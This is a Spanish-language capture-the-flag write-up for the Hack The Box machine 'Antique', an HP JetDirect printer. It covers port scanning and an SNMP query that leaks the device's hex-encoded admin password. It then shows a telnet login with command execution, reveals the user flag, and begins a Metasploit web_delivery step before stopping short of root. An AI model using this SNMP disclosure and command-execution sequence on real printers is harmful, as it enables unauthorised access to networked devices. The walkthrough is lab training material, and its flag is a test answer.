Antique

Sobre esta maquina: HTB

Sistema Operativo: Windows

Skills Usados:

  • UDP

  • Printer

  • RC

  • Hex

Realizamos el primer reconocimiento:

nmap -p- --open -sS -T4 -Pn -n 10.10.11.107 -oN First_Scann

PORT STATE SERVICE 23/tcp open telnet

Realizamos scann UDP:

nmap -sU -T4 -n 10.10.11.107 -oN udp_scann PORT STATE SERVICE 20/udp open|filtered ftp-data 123/udp open|filtered ntp 136/udp open|filtered profile 161/udp open snmp 17726/udp open|filtered unknown 19047/udp open|filtered unknown 30656/udp open|filtered unknown 40915/udp open|filtered unknown 49176/udp open|filtered unknown 49213/udp open|filtered unknown 59207/udp open|filtered unknown

Nos conectamos por telnet y nos damos cuenta que es una impresora:

telnet 10.10.11.107 23 Trying 10.10.11.107... Connected to 10.10.11.107. Escape character is '^]'

HP JetDirect

Buscamos exploits:

searchsploit hp jetdirect

Exploit Title | Path

HP JetDirect Printer - SNMP JetAdmin Device Password Disclosure | hardware/remote/22319.txt A problem with JetDirect printers could make it possible for a remote user to gain administrative access to the printer.

It has been reported that HP JetDirect printers leak the web JetAdmin device password under some circumstances. By sending an SNMP GET request to a vulnerable printer, the printer will return the hex-encoded device password to the requester. This could allow a remote user to access and change configuration of the printer.

C:>snmputil get example.printer public .1.3.6.1.4.1.11.2.3.9.1.1.13.0

Utilizamos el exploit:

snmpget -v 1 -c public 10.10.11.107 .1.3.6.1.4.1.11.2.3.9.1.1.13.0 Created directory: /var/lib/snmp/cert_indexes iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = BITS: 50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135

Desciframos el codigo hex usando cyberchef:

P@ssw0rd@123!!123

Ingresamos y buscamos la flag:

telnet 10.10.11.107 23 Trying 10.10.11.107... Connected to 10.10.11.107. Escape character is '^]'. HP JetDirect Password: P@ssw0rd@123!!123 exec whoami lp exec ls telnet.py user.txt exec cat user.txt 25328e913fee9c897c9c6bdbd200c689

Vemos que la maquina esta conectada por defecto al puerto 631 asi que realizamos portforwarding con metasploit:

msfconsole [msf](Jobs:0 Agents:0) >> search web_delivery 5 exploit/multi/script/web_delivery 2013-07-19 manual No Script Web Delivery

[msf](Jobs:0 Agents:0) >> use 5

Proximamente rootearemos esta maquina

PreviousJerryNextCap

Last updated